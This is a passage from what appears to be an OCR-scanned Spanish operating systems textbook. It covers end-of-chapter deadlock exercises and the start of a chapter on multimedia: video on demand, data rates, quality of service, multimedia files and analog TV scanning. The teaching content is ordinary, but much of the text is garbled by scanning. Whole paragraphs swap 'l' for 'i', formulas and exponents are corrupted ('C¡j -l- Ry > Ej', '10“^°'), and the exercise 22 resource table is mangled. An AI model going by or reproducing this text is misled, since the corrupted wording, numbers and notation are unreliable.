estas condiciones no son suficientes para que ocurra un interbloqueo de recursos. ¿Cuándo son su¬ 
ficientes estas condiciones para que ocurra un interbloqueo de recursos? 

5. La figura 6-3 muestra el concepto de un gráfico de recursos. ¿Existen los gráficos ilegales? Es de¬ 
cir, ¿los que violan estructural mente el modelo que hemos utilizado del uso de recursos? De ser así, 
proporcione un ejemplo de uno. 

6 . Suponga que hay un interbloqueo de recursos en un sistema. Proporcione un ejemplo para mostrar 
que el conjunto de procesos en interbloqueo puede incluir a los procesos que no están en la cadena 
circular en la ruta de asignación de recursos correspondiente. 

7. El análisis del algoritmo de la avestruz menciona la posibilidad de que se llenen las entradas en la 
tabla de procesos u otras tablas del sistema. ¿Puede sugerir una forma de permitir que un adminis¬ 
trador del sistema se recupere de dicha situación? 

8 . Explique cómo se puede recuperar el sistema del interbloqueo en el problema anterior, usando a) Re¬ 
cuperación por medio apropiativo: b) Recuperación por medio del retroceso: y c) Recuperación por 
medio de la eliminación de procesos. 

9. Suponga que en la figura 6-6 C¡j -l- Ry > Ej para cierto valor de i. ¿Qué implicaciones tiene esto pa¬ 
ra el sistema? 

10. ¿Cuál es la diferencia clave entre el modelo que se muestra en la figura 6-8, y los estados seguro e 
inseguro descritos en la sección 6.5.2? ¿Cuál es la consecuencia de esta diferencia? 

11. ¿Se puede utilizar también el esquema de trayectorias de recursos de la figura 6-8 para ilustrar el 
problema de los interbloqueos con tres procesos y tres recursos? De ser así, ¿cómo se puede hacer 
esto? En caso contrario, ¿por qué no? 

12. En teoría, los gráficos de trayectorias de recursos se podrían utilizar para evitar interbloqueos. M e- 
diante la programación astuta, el sistema operativo podría evitar las regiones inseguras. Sugiera un 
problema práctico en el que se haga esto. 

13. ¿Puede un sistema encontrarse en un estado en el que no esté en interbloqueo ni sea seguro? De ser 
así, proporcione un ejemplo. En caso contrario, demuestre que todos los estados están en interblo¬ 
queo o son seguros. 

14. Considere un sistema que utilice el algoritmo del banquero para evitar los interbloqueos. En cierto 
momento, un proceso P solicita un recurso R, pero esta petición se rechaza aun cuando R está 
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disponible en ese momento. ¿Significa que si el sistema asignara R a P, entraría en un interblo¬ 
queo? 

15. U na limitación clave del algoritmo del banquero es que requiere un conocimiento de las necesida¬ 
des máximas de recursos de todos los procesos. ¿Es posible diseñar un algoritmo para evitar inter¬ 
bloqueos que no requiera esta información? Explique su respuesta. 

16. A nalice con cuidado la figura 6-ll(b). Si D pide una unidad más, ¿conduce esto a un estado seguro 
o a uno inseguro? ¿Qué pasa si la petición proviene de C en vez de D? 

17. U n sistema tiene dos procesos y tres recursos idénticos. Cada proceso necesita un máximo de dos 
recursos. ¿Es posible el interbloqueo? Explique su respuesta. 

18. Considere el problema anterior otra vez, pero ahora con p procesos, en donde cada uno necesita un 
máximo de m recursos y un total de r recursos disponibles. ¿Qué condición se debe aplicar para que 
el sistema esté libre de interbloqueos? 

19. Suponga que el proceso A en la figura 6-12 solicita la última unidad de cinta. ¿Conduce esta acción 
a un interbloqueo? 

20. U na computadora tiene seis unidades de cinta, y n procesos compiten por ellas. Cada proceso pue¬ 
de necesitar dos unidades. ¿Para qué valores de n está el sistema libre de interbloqueos? 

21 . El algoritmo del banquero se está ejecutando en un sistema con m clases de recursos y n procesos. 
En el límite de valores grandes para m y n, el número de operaciones que se deben realizar para com¬ 
probar que un estado sea seguro es proporcional a m^ n*’. ¿Cuáles son los valores de a y b? 

22. U n sistema tiene cuatro procesos y cinco recursos asignables. La asignación actual y las necesida¬ 
des máximas son las siguientes: 



Asignado 

M áximo 

Disponible 

Proceso A 

10211 

112 13 

00 x11 

Proceso B 

2 0 110 

2 2 2 1 0 


Proceso C 

11010 

21310 


Proceso D 

1111 0 

112 2 1 



¿Cuál es el valor menor de x para el que éste es un estado seguro? 

23. U na manera de eliminar la espera circular es tener una regla que determine que un proceso tiene de¬ 
recho sólo a un recurso en un momento dado. Proporcione un ejemplo para mostrar que esta restric¬ 
ción es inaceptable en muchos casos. 

24. Dos procesos A y B necesitan cada uno tres registros (1, 2 y 3) en una base de datos. Si A los pide 
en el orden 1, 2, 3 y B los pide en el mismo orden, no es posible un interbloqueo. No obstante, si B 
los pide en el orden 3, 2,1, entonces es posible el interbloqueo. Con tres recursos, hay tres o seis 
posibles combinaciones en las que cada proceso puede solicitar los recursos. ¿Qué fracción de to¬ 
das las combinaciones se garantiza que esté libre de interbloqueo? 

25. U n sistema distribuido que utiliza buzones de correo tiene dos primitivas I PC, send y receive. La 
última primitiva especifica un proceso del que va a recibir mensajes, y se bloquea si no hay un men- 
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saje disponible de ese proceso, aun cuando pueda haber mensajes en espera de otros procesos. No 
hay recursos compartidos, pero los procesos se necesitan comunicar con frecuencia sobre otras cues¬ 
tiones. ¿Es posible el interbloqueo? Explique. 

26. En un sistema electrónico de transferencia de fondos hay cientos de procesos idénticos que funcio¬ 
nan de la siguiente manera. Cada proceso lee una línea de entrada que especifica un monto de dine¬ 
ro, la cuenta a la que se va a acreditar ese monto y la cuenta de la que se va a restar. Después bloquea 
ambas cuentas y transfiere el dinero, liberando los bloqueos cuando termine. Con muchos procesos 
ejecutándose en paralelo, hay un peligro muy real de que la cuenta x bloqueada no pueda bloquear 
a y, debido a que y ha sido bloqueada por un proceso que ahora espera por x. Idee un esquema que 
evite los interbloqueos. No libere un registro de una cuenta sino hasta que haya completado las tran¬ 
sacciones (en otras palabras, no se permiten las soluciones que bloquean una cuenta y después la li¬ 
beran de inmediato si la otra está bloqueada). 

27. U na manera de evitar los interbloqueos es eliminando la condición de contención y espera. En el tex¬ 
to se propuso que antes de pedir un nuevo recurso, un proceso debe liberar primero los recursos que 
contenga (suponiendo que sea posible). Sin embargo, esto introduce el peligro de que podría obte¬ 
ner el nuevo recurso pero perder algunos de los existentes con los procesos competidores. Propon¬ 
ga una mejora a este esquema. 

28. U n estudiante de ciencias computacionales asignado para trabajar en los interbloqueos piensa en la 
siguiente forma brillante de eliminar interbloqueos. Cuando un proceso solicita un recurso, especi¬ 
fica un límite de tiempo. Si el proceso se bloquea debido a que el recurso no está disponible, se ini¬ 
cia un temporizador. Si se excede el límite de tiempo, el proceso se libera y se le permite ejecutarse 
de nuevo. Si usted fuera el profesor, ¿qué calificación le daría a esta proposición y por qué? 

29. Explique las diferencias entre interbloqueo, bloqueo activo e inanición. 

30. Cenicienta y el Príncipe se están divorciando. Para dividir su propiedad, han acordado el siguiente al¬ 
goritmo. Cada mañana, cada uno puede enviar una carta al abogado del otro, solicitando un artículo 
de su propiedad. Como se requiere un día para entregar las cartas, han acordado que si ambos des¬ 
cubren que han solicitado el mismo artículo el mismo día, el siguiente día enviarán una carta para 
cancelar la petición. Entre sus pertenencias está su perro Woofer, la casa de Woofer, su canario 
Tweeter y la jaula deTweeter. Los animales adoran sus hogares, por lo que se ha acordado que cual¬ 
quier división de propiedad que separe a un animal de su casa es inválida, y toda la división tendrá 
que empezar desde cero. Tanto Cenicienta como el Príncipe quieren desesperadamente a Woofer. 
Para que puedan salir de vacaciones (separadas), cada esposo ha programado una computadora per¬ 
sonal para manejar la negociación. Cuando regresan de vacaciones, las computadoras están todavía 
negociando. ¿Por qué? ¿Es posible el interbloqueo? ¿Es posible la inanición? Explique. 

31. Un estudiante con especialidad en antropología y licenciatura en ciencias computacionales se ha em¬ 
barcado en un proyecto de investigación para ver si los babuinos africanos pueden aprender sobre 
los interbloqueos. El estudiante localiza un cañón profundo y sujeta una cuerda a lo largo de éste, 
para que los babuinos puedan cruzar con las manos. Varios babuinos pueden cruzar al mismo tiem¬ 
po, siempre y cuando todos vayan en la misma dirección. Si los babuinos que avanzan hacia el es¬ 
te y los que avanzan hacia el oeste llegan a la cuerda al mismo tiempo, se producirá un interbloqueo 
(los babuinos quedarán atorados a la mitad) ya que es imposible que un babuino trepe sobre otro 
mientras está suspendido sobre el cañón. Si un babuino desea cruzar el cañón, debe comprobar que 
no haya otro babuino cruzando en dirección opuesta. Escriba un programa que utilice semáforos y 
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evite el interbloqueo. No se preocupe por una serie de babuinos que avanzan hacia el este y detie¬ 
nen a los babuinos que avanzan hacia el oeste por tiempo indefinido. 

32. Repita el problema anterior, pero ahora evite la inanición. Cuando un babuino que desea cruzar al 
este llega a la cuerda y encuentra babuinos cruzando hacia el oeste, espera hasta que la cuerda esté 
vacía, pero no se permite que los babuinos que avanzan hacia el oeste empiecen, por lo menos has¬ 
ta que un babuino haya cruzado al otro lado. 

33. Programe una simulación del algoritmo del banquero. Su programa debe recorrer en forma cíclica 
cada uno de los clientes el banco que hacen una petición y evalúan si es seguro o inseguro. Escriba 
un registro de peticiones y decisiones en un archivo. 

34. Escriba un programa para implementar el algoritmo de detección de interbloqueos con varios recur¬ 
sos de cada tipo. Su programa debe leer de un archivo las siguientes entradas: el número de proce¬ 
sos, el número de tipos de recursos, el número de recursos de cada tipo en existencia (vector E), la 
matriz de asignaciones actuales C (primera fila, seguida por la segunda fila, y así en lo sucesivo), 
la matriz de peticiones R (primera fila, seguida de la segunda fila, y así en lo sucesivo). La salida de 
su programa deberá indicar si hay un interbloqueo en el sistema o no. En caso de que haya un inter¬ 
bloqueo en el sistema, el programa deberá imprimir las identidades de todos los procesos que estén 
en interbloqueo. 

35. Escriba un programa que detecte si hay un interbloqueo en el sistema al utilizar un gráfico de asig¬ 
nación de recursos. Su programa deberá leer de un archivo las siguientes entradas: el número de pro¬ 
cesos y el número de recursos. Para cada proceso debe leer cuatro números: el número de recursos 
que contiene en un momento dado, los IDs de los recursos que contiene, el número de recursos que 
solicita en un momento dado, los IDs de los recursos que está solicitando. La salida del programa 
debe indicar si hay un interbloqueo en el sistema o no. En caso de que haya un interbloqueo en el 
sistema, el programa debe imprimir las identidades de todos los procesos que están en interbloqueo. 
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SISTEMAS OPERATIVOS 
MULTIMEDIA 


Las películas digitales, los clips de video y la música se están convirtiendo en una forma cada vez 
más común de presentar Información y entretenimiento mediante el uso de una computadora. Los 
archivos de audio y video se pueden almacenar en un disco y reproducirse sobre pedido. Sin em¬ 
bargo, sus características son muy distintas de los archivos de texto tradicionales para los que fue¬ 
ron diseñados los sistemas de archivos actuales. Como consecuencia, se necesitan nuevos tipos de 
sistemas de archivos para manejarlos. Peor aún: el proceso de almacenar y reproducir audio y vi¬ 
deo Impone nuevas demandas sobre el programador y otras partes del sistema operativo. En este ca¬ 
pítulo estudiaremos muchas de estas cuestiones y sus Implicaciones para los sistemas operativos 
diseñados para manejar multimedia. 

Por lo general, las películas digitales entran en la clasificación de multimedia, que en sentido 
literal significa varios medios. Bajo esta definición, este libro es un trabajo de multimedia. Después 
de todo, contiene dos medios: texto e Imágenes (las figuras). Sin embargo, la mayoría de las perso¬ 
nas utilizan el término "multimedia" para Indicar un documento que contiene dos o más medios 
continuos; es decir, medios que deben reproducirse durante cierto Intervalo. En este libro utilizare¬ 
mos el término multimedia en este sentido. 

Otro término un poco ambiguo es el de "video". En sentido técnico, es sólo la porción de la Ima¬ 
gen de una película (en contraste a la porción del sonido). De hecho, las cámaras de video y las te¬ 
levisiones tienen a menudo dos conectares, uno etiquetado como "video" y el otro como "audio", ya 
que las señales están separadas. Sin embargo, el término "video digital" se refiere por lo general al 
producto completo, con Imagen y sonido. A continuación utilizaremos el término "película" para re¬ 
ferirnos al producto completo. Tenga en cuenta que una película en este sentido no necesita ser un 
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filme dedos horas producido por un estudio de Hollywood, a un costo que excede el de un Boeing 
747. De acuerdo con nuestra definición, un clip de noticias de 30 segundos, transmitido en flujo 
continuo desde la página de inicio de CNN a través de Internet, es también una película. Por cier¬ 
to, utilizaremos el término "clips de video" al hacer referencia a películas muy cortas. 


7.1 INTRODUCCIÓN A MULTIMEDIA 

Antes de entrar en los detalles sobre la tecnología de multimedia, tal vez sean de utilidad unas pa¬ 
labras sobre su uso actual y futuro para establecer el escenario. En una sola computadora, multime¬ 
dia a menudo significa reproducir una película pregrabada de un DVD (Disco versátil digital). Los 
DV Ds son discos ópticos que usan los mismos discos en blanco de policarbonato de 120 mm (plás¬ 
tico) que los CD-ROM s, pero grabados a una densidad mayor, con lo cual se obtiene una capacidad 
de entre 5 GB y 17 GB, dependiendo del formato. 

Hay dos candidatos que están tratando de ser el sucesor del DVD. A uno se le conoce como 
Blu-ray y contiene 25 GB en el formato de una sola capa (50 GB en el formato de doble capa). Al 
otro se le conoce como HD DVD y contiene 15 GB en el formato de una sola capa (30 GB en el 
formato de doble capa). Cada formato está respaldado por un consorcio distinto de compañías de 
computadoras y películas. En apariencia, las industrias de la electrónica y el entretenimiento sien¬ 
ten nostalgia por las guerras de los formatos en las décadas de 1970 y 1980 entre Betamax y VHS, 
por lo que decidieron repetirlas. Sin duda, esta guerra de formatos retrasará la popularidad de am¬ 
bos sistemas por años, a medida que los consumidores esperen ver cuál es el que va a ganar. 

Otro uso de multimedia es para descargar clips de video a través de Internet. M uchas páginas 
Web tienen elementos en los que se puede hacer clic para descargar películas cortas. Los sitios Web 
como YouTube tienen miles de clips de video disponibles. A medida que la tecnologías de distribu¬ 
ción más veloces, como la TV por cable y ADSL (Asymmetric Digital Suscriber Line, Línea de sus- 
criptor digital asimétrica), vayan dominando el mercado y se conviertan en la norma a seguir, la 
presencia de clips de video en Internet aumentará vertiginosamente. 

Otra área en la que se debe soportar multimedia es en la creación de los videos mismos. Exis¬ 
ten sistemas de edición de multimedia y para obtener el mejor rendimiento se necesitan ejecutar en 
un sistema operativo tanto multimedia como de trabajo tradicional. 

Un campo más en el que se está haciendo cada vez más importante el uso de multimedia es en 
los juegos de computadora. A menudo los juegos reproducen clips de video para describir cierto ti¬ 
po de acción. Por lo general los clips son cortos, pero son muchos y el correcto se selecciona en for¬ 
ma dinámica, dependiendo de cierta acción que haya realizado el usuario. Éstos son cada vez más 
sofisticados. Desde luego, el juego en sí puede generar grandes cantidades de animación, pero ma¬ 
nejar el video generado por un programa es algo distinto a mostrar una película. 

Por último, el santo grial del mundo de multimedia es el video bajo demanda, el cual se refiere 
a la capacidad de los consumidores de seleccionar una película en su hogar, usando el control remoto 
de su televisión (o el ratón) y verla en su televisión (o monitor de computadora) al instante. Para ha¬ 
bilitar el video bajo demanda se necesita una infraestructura especial. En la figura 7-1 podemos ver 
dos infraestructuras posibles del video bajo demanda. Cada una contiene tres componentes esencia¬ 
les: uno o más servidores de video, una red de distribución y un aparato conectado al televisor para 
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decodificar i a señai. Ei servidor de video es una poderosa computadora que aimacena muchas pe- 
iícuias en su sistema de archivos y ias reproduce bajo demanda. A igunas veces, ias mainframes se 
utiiizan como servidores de video, ya que ei proceso de conectar (por ejempio) 1000 discos exten¬ 
sos con una mainframe es simpie, mientras que conectar 1000 discos de cuaiquier tipo a una com¬ 
putadora personai es un probiema serio. Gran parte dei materiai en ias siguientes secciones es 
acerca de ios servidores de video y sus sistemas operativos. 




Cable coaxial de TV por cable 
(b) 


Figura 7-1. Video bajo demanda que utiliza distintas tecnologías de distribución local, 
(a) ADSL, (b) TV por cable. 


La red de distribución entre ei usuario y ei servidor de video debe ser capaz de transmitir da¬ 
tos en aita veiocidad y en tiempo reai. Ei diseño de dichas redes es interesante y compiejo, pero 
está fuera dei ai canee de este iibro. No diremos nada más acerca de eiias, excepto para recaicar 
que estas redes siempre utiiizan fibra óptica desde ei servidor de video hasta una caja de unión en 
cada vecindario en ei que viven ios Chentes. En ios sistemas ADSL, que son proporcionados por 
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las compañías telefónicas, la línea telefónica de par trenzado existente provee el último kilómetro 
(más o menos) de transmisión. En los sistemas de TV por cable, que son proporcionados por los 
operadores de cable, el cableado de TV por cable existente se utiliza para la distribución local. 
ADSL tiene la ventaja de proporcionar a cada usuario un canal dedicado, con lo cual se garantiza 
el ancho de banda, pero éste es bajo (unos cuantos megabits/seg) debido a las limitaciones del ca¬ 
ble telefónico existente. La TV por cable utiliza cable coaxial con alto ancho de banda (gigabits- 
/seg), pero muchos usuarios tienen que compartir el mismo cable, dada la disputa por éste, lo cual 
no produce un ancho de banda garantizado para cada usuario. Sin embargo, para poder competir 
con las compañías de cable, las compañías telefónicas están empezando a instalar fibra en los ho¬ 
gares individuales, en cuyo caso ADSL sobre fibra tendrá mucho más ancho de banda que el 
cable. 

La última pieza del sistema es el decodificador (set-top box), donde termina la línea ADSL o 
el cable deTV. De hecho, este dispositivo es una computadora normal, con ciertos chips especiales 
para la decodificación y descompresión del video. Como mínimo contiene una CPU, RAM , ROM , 
la interfaz con A DSL o cable, y un conectar para la televisión. 

Una alternativa para el decodificadores utilizar la PC existente del cliente y mostrar la pelícu¬ 
la en el monitor. Lo interesante es que la razón por la que se consideran los decodificadores, dado 
que la mayoría de los consumidores tal vez ya tengan una computadora, es que los operadores del 
video bajo demanda esperan que las personas vean películas en sus salas, que por lo general contie¬ 
nen una TV pero raras veces una computadora. Desde una perspectiva técnica, utilizar una compu¬ 
tadora personal en vez de un aparato dedicado tiene mucho más sentido, ya que es más potente, tiene 
un disco duro grande y una resolución de pantalla mucho mayor. De cualquier forma, con frecuen¬ 
cia haremos la distinción entre el servidor de video y el proceso cliente en el extremo del usuario, 
que decodifica y visualiza la película. Sin embargo, en términos de diseño del sistema, no importa 
mucho si el proceso cliente se ejecuta en un aparato dedicado o en una PC. Para un sistema de edi¬ 
ción de video de escritorio, todos los procesos se ejecutan en el mismo equipo, pero seguiremos uti¬ 
lizando la terminología de servidor y cliente para que sea más claro qué proceso está llevando a 
cabo cuál función. 

Volviendo al concepto de multimedia, tiene dos características clave que deben comprenderse 
bien para lidiar con ella de manera exitosa: 

1. La multimedia utiliza velocidades de datos en extremo altas. 

2. La multimedia requiere reproducción en tiempo real. 

Las altas velocidades de datos provienen de la naturaleza de la información visual y acústica. El ojo 
y el oído pueden procesar cantidades prodigiosas de información por segundo, y tienen que alimen¬ 
tarse a esa velocidad para producir una experiencia de observación aceptable. En la figura 7-2 se lis¬ 
tan las velocidades de datos de unas cuantas fuentes de multimedia digital y ciertos dispositivos de 
hardware comunes. A nalizaremos algunos de estos formatos de codificación más adelante en este ca¬ 
pítulo. Lo que debemos tener en cuenta son las altas velocidades de transmisión de datos requeridas 
por la multimedia, la necesidad de comprensión y la cantidad de almacenamiento requerida. Por 
ejemplo, una película HDTV de 2 horas sin comprimir llena un archivo de 570 GB. Un servidor de 
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video que almacene 1000 de esas películas necesitará 570 TB de espacio en disco, una cantidad nada 
trivial según los estándares actuales. Los que también debemos tener en cuenta es que sin la com¬ 
presión de datos, el hardware actual no puede estar a la par con las velocidades de tranmisión de 
datos que se producen. M ás adelante en este capítulo analizaremos la compresión de video. 


Fuente 

Mbps 

GB/hra 

Teléfono (PGM) 

0.064 

0.03 

Música MP3 

0.14 

0.06 

CD de audio 

1.4 

0.62 

Película MPEG-2 (640 x 480) 

4 

1.76 

Cámara de video digital (720 x 480) 

25 

11 

TV sin compresión (640 x 480) 

221 

97 

HDTV sin comprimir (1280 x 720) 

648 

288 


Dispositivo 

Mbps 

Fast Ethernet 

100 

Disco EIDE 

133 

Red ATM OC-3 

156 

IEEE 1394b (FireWire) 

800 

Gigabit Ethernet 

1000 

Disco SATA 

3000 

Disco SCSI Uitra-640 

5120 


Figura 7-2. Algunas velocidades de datos para los dispositivos de E/S multimedia y de 
alto rendimiento. Observe que 1 M bps son 10® bits/seg, pero 1GB son 2^® bytes. 


La segunda demanda que impone multimedia en un sistema es la necesidad de enviar datos en 
tiempo real. La porción de video de una película digital consiste en cierto número de cuadros por 
segundo. El sistema NTSC, que se utiliza en Norteamérica, Sudamérica y Japón, opera a 30 cua- 
dros/seg (29.97 para el purista), mientras que los sistemas PAL y SECAM , que se utilizan en la ma¬ 
yoría del resto del mundo, operan a 25 cuadros/seg (25.00 para el purista). Los cuadros se deben 
enviar en intervalos precisos de 33.3 mseg o 40 mseg, respectivamente, o la película se verá entre¬ 
cortada. 

Oficialmente, NTSC significa Comité Nacional de Estándares deTelevisión (National Televi¬ 
sión Standards Committee), pero la mala forma en que el color se adoptó en el estándar cuando se 
inventó la televisión a color dio pie a la broma en la industria de que en realidad significa Nunca 
Dos Veces el M ismo Color (Never Twice the Same Color). PAL significa Línea de Fase Al temante 
(Phase Alternating Line). Técnicamente es el mejor de los sistemas. SECAM se utiliza en Francia 
(tenía la intención de proteger a los fabricantes de televisiones franceses de la competencia extran¬ 
jera) y significa Color Secuencial con M emoria (SEquentiel Couleur Avec M emoire). SECAM tam¬ 
bién se utiliza en el Este de Europa debido a que cuando se introdujo la televisión ahí, los gobiernos 
que entonces eran comunistas querían evitar que todos vieran la televisión alemana (PAL), por lo que 
eligieron un sistema incompatible. 

El oído es más sensible que el ojo, por lo que una variación de hasta unos cuantos milisegundos 
en los tiempos de respuesta se podrá notar. La variabilidad en las velocidades de entrega se conoce 
como fluctuación y debe estar vinculada estrictamente para un buen rendimiento. Tenga en cuenta 
que la fluctuación no es lo mismo que el retraso. Si la red de distribución de la figura 7-1 retrasa en 
forma uniforme todos los bits por exactamente 5.000 seg, la película empezará un poco después, pe¬ 
ro se verá bien. Por otra parte, si retrasa los cuadros al azar por un valor entre 100 y 200 mseg, la 
película se verá como un filme antiguo de Charlie Chaplin, sin importar quién la estelarice. 
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Las propiedades en tiempo reai requeridas para reproducir muitimedia de una manera acepta- 
bie se describen a menudo mediante parámetros de calidad del servicio. Inciuyen ei ancho de ban¬ 
da promedio disponibie, ei ancho de banda pico disponibie, ei retraso mínimo y máximo (que en 
conjunto vincuian ia fiuctuación) y ia probabiiidad de pérdida de bits. Por ejempio, un operador de 
red podría ofrecer un servicio que garantizara un ancho de banda promedio de 4 Mbps, 99% 
de ios retrasos en ia transmisión en ei intervaio de 105 a 110 mseg y una veiocidad de pérdida de 
bits de 10“^°, que estaría bien para peiícuias M PEG-2. Ei operador también podría ofrecer un ser¬ 
vicio más económico y de menor grado, con un ancho de banda promedio de 1 M bps (por ejempio, 
ADSL), en cuyo caso ia caiidad tendría que comprometerse de aiguna forma, tai vez reduciendo ia 
resoiución, disminuyendo ia veiocidad de ios cuadros o descartando ia información de ios coiores 
y mostrando ia peiícuia en bianco y negro. 

La manera más común para proveer ias garantías de caiidad dei servicio es reservar ia capaci¬ 
dad por adeiantado para cada nuevo ciiente. Los recursos reservados inciuyen una parte de ia CPU, 
búferes de memoria, capacidad de transferencia dei disco y ancho de banda de ia red. Si iiega un 
nuevo ciiente y desea observar una peiícuia, pero ei servidor de video o ia red caicuia que no tiene 
ia capacidad suficiente para otro ciiente, será necesario rechazar ai nuevo ciiente para evitar degra¬ 
dar ei servicio que se proporciona a ios ciientes actuaies. Como consecuencia, ios servidores de 
muitimedia necesitan esquemas de reservación de recursos y un algoritmo de control de admisión 
para decidir cuándo puede manejar más trabajo. 


7.2 ARCHIVOS DE MULTIMEDIA 

En ia mayoría de ios sistemas, un archivo de texto ordinario consiste en una secuencia iineai de by- 
tessin una estructura queei sistema operativo conozca o de ia cuai se preocupe. Con muitimedia, ia 
situación es más compiicada. Para empezar, ei video y ei audio son compietamente diferentes. 
Se capturan mediante distintos dispositivos (chip CCD, en comparación con ei micrófono), tienen 
una estructura interna distinta (ei video tiene de 25 a 30 cuadros/seg; ei audio tiene 44,100 muestras- 
/seg), y se reproducen mediante distintos dispositivos (monitor, en comparación con ias bocinas). 

Además, ahora ias peiícuias de Hoiiywood están orientadas a una audiencia mundiai que, en su 
mayoría, no entiende ingiés. Hay dos formas de iidiar con esteúitimo punto. Para aigunos países se 
produce una pista de sonido adicionai y ias voces se dobian en ei ienguaje iocai (pero no ios efec¬ 
tos de sonido). En japón, todas ias teievisiones tienen dos canaies de sonido para queei espectador 
pueda escuchar iosfiimes extranjeros en ei ienguaje originai o en japonés. Se utiiiza un botón en ei 
controi remoto para seieccionar ei ienguaje. En otros países se utiiiza ia pista de sonido originai, con 
subtítuios en ei ienguaje iocai. 

Además, muchas peiícuias deTV ahora ofrecen subtítuios en ingiés también, para permitir que 
ias personas de habia ingiesa pero con discapacidad auditiva puedan disfrutar ia peiícuia. Ei resui- 
tado neto es que una peiícuia digitai puede consistir reaimente de muchos archivos: un archivo 
de video, varios archivos de audio y varios archivos de texto con subtítuios en varios ienguajes. 
Los DVDs tienen ia capacidad de aimacenar hasta 32 archivos de ienguajes y subtítuios. En ia fi¬ 
gura 7-3 se muestra un conjunto simpie de archivos muitimedia. M ás adeiante en este capítuio ex- 
piicaremos ei significado de adeianto rápido y atraso rápido. 
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Video 


Audio en inglés 


Audio en francés 


Audio en alemán 


Subtítulos en inglés 

Subtítulos en holandés I Oag, Bob I Oag, AIÍcg I Mooie dag I Jazeker I Hoe gaat hetl Prima I En jíj I Goed 


Adelanto rápido 


Atraso rápido 


Figura 7-3. U na película puede consistir en varios archivos. 

Como consecuencia, el sistema de archivos necesita llevar la cuenta de varios "subarchivos" 
por cada archivo. Un posible esquema es administrar cada subarchivo como un archivo tradicional 
(por ejemplo, usar un nodo-i para llevar la cuenta de sus bloques) y tener una nueva estructura de 
datos que liste todos los subarchivos por cada archivo multimedia. Otra forma es inventar un tipo 
de nodo-i de dos dimensiones, donde cada columna liste los bloques de cada subarchivo. En gene¬ 
ral, la organización debe ser tal que el espectador pueda seleccionar en forma dinámica qué pistas 
de audio y subtítulos utilizar al momento de ver la película. 

En todos los casos, también se necesita alguna forma de mantener sincronizados los subarchi¬ 
vos, para que cuando se reproduzca la pista de audio seleccionada, permanezca en sincronía con el 
video. Si el audio y el video se desfasan aunque sea ligeramente, el espectador puede escuchar las 
palabras del actor antes o después de que se muevan sus labios, lo cual es muy molesto. 

Para comprender mejor la forma en que se organizan los archivos multimedia, es necesario 
comprender cómo funcionan el audio y el video digital con cierto detalle. Ahora veremos una in¬ 
troducción a estos temas. 

7.2.1 Codificación de video 

El ojo humano tiene la propiedad deque, cuando se proyecta una imagen en la retina, se retiene du¬ 
rante cierto número de milisegundos antes de deteriorarse. Si se proyecta una secuencia de imáge¬ 
nes a 50 o más imágenes/seg, el ojo no se da cuenta de que está viendo imágenes discretas. Todos 


ARCHIVOS DE MULTIMEDIA 
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Cuadro 
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Helio, Bob Helio, Alice Nice day Sure is How are you Great And you Good 
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los sistemas de imágenes en movimiento basadas en video y en fiime expiotan este principio para 
producir peiícuias en movimiento. 

Para comprender ios sistemas de video, es más fácii empezar con ia teievisión en bianco y ne¬ 
gro, simpie y anticuada. Para representar ia imagen bidimensionai enfrente de eiia como un voita- 
je unidimensionai como una función dei tiempo, ia cámara pasa un haz de eiectrones rápidamente 
de un iado a otro de ia imagen, y con ientitud ia recorre de arriba hacia abajo, grabando ia intensi¬ 
dad de ia iuz a medida que avanza. Ai finai dei barrido, que se conoce como un cuadro, ei haz re¬ 
gresa a su posición originai. Esta intensidad como función dei tiempo se transmite y ios receptores 
repiten ei proceso deexpioración para reconstruir ia imagen. Ei patrón deexpioración utiiizado tan¬ 
to por ia cámara como por ei receptor se muestra en ia figura 7-4 (como información adicionai, ias 
cámaras CCD integran en vez deexpiorar, pero aigunas cámaras y todos ios monitores deCRT ex- 
pioran). 


Línea de El siguiente campo La línea de exploración 



Los parámetros exactos de expioración varían de un país a otro. NTSC tiene 525 iíneas de ex- 
pioración, una proporción de aspecto horizontai a verticai de 4:3 y 30 (en reaiidad, 29.97) cuadros- 
/seg. Los sistemas europeos PAL y SECAM tienen 625 iíneas deexpioración, ia misma proporción 
de aspecto de 4:3 y 25 cuadros/seg. En ninguno de estos dos sistemas se muestran ias primeras ií¬ 
neas superiores ni unas cuantas de ias inferiores (para aproximar una imagen rectanguiar en ios 
CRTs redondos originaies). Sóio se muestran 483 de ias 525 iíneas de expioración de NTSC (y 576 
de ias 625 iíneas de expioración de PAL/SECAM ). 

Aunque 25 cuadros/seg es suficiente para capturar un movimiento uniforme, a esa veiocidad 
de cuadro muchas personas (en especiai ios aduitos mayores) percibirán que ia imagen parpadea 
(debido a que ia imagen anterior se ha borrado de ia retina antes de que aparezca ia nueva imagen). 












SECCION 7.2 


ARCHIVOS DE MULTIMEDIA 


475 


En vez de aumentar la velocidad de cuadro, para lo cual se requeriría más del escaso ancho de ban¬ 
da, se utiliza un método distinto. En vez de mostrar las líneas de exploración en orden de arriba 
hacia abajo, primero se muestran las líneas de exploración impares y después las pares. Cada uno 
de estos medios cuadros se conoce como campo. Los experimentos han demostrado que, aunque 
las personas notan un parpadeo a 25 cuadros/seg, no lo notaron a 50 campos/seg. A esta técnica se 
le conoce como entrelazado. Se dice que la televisión o el video no entrelazado es progresivo. 

El video a color utiliza el mismo patrón de exploración que el monocromático (blanco y ne¬ 
gro), sólo que en vez de mostrar la imagen con un haz móvil, se utilizan tres haces que se mueven 
al unísono. Se utiliza un haz para cada uno de los tres colores primarios aditivos: rojo, verde y azul 
(RGB). Esta técnica funciona debido a que cualquier color se puede construir a partir de una 
superposición lineal de rojo, verde y azul con las intensidades apropiadas. Sin embargo, para la 
transmisión en un solo canal, las tres señales de color se deben combinar en una sola señal com¬ 
puesta. 

Para poder ver las transmisiones de color en receptores en blanco y negro, los tres sistemas 
combinan en forma lineal las señales RGB en una señal de luminancia (brillo) y dos decrominan- 
cia (color), aunque todas utilizan distintos coeficientes para construir estas señales a partir de las 
RGB. Curiosamente, el ojo es mucho más sensible a la señal de luminancia que a las de crominan- 
cia, por lo que éstas no se necesitan transmitir con tanta precisión. En consecuencia, la señal de lu¬ 
minancia se puede transmitir a la misma frecuencia que la antigua señal de blanco y negro, por lo 
que se puede recibir en los televisores en blanco y negro. Las dos señales de crominancia se trans¬ 
miten en bandas estrechas a frecuencias más altas. A Igunos televisores tienen perillas o controles eti¬ 
quetadas como brillo, tinte y saturación (o brillo, tinte y color) para controlar estas tres señales por 
separado. Es necesario comprender la luminancia y la crominancia para entender cómo funciona la 
compresión de video. 

Hasta ahora hemos visto el video análogo: procedamos a describir el video digital. La repre¬ 
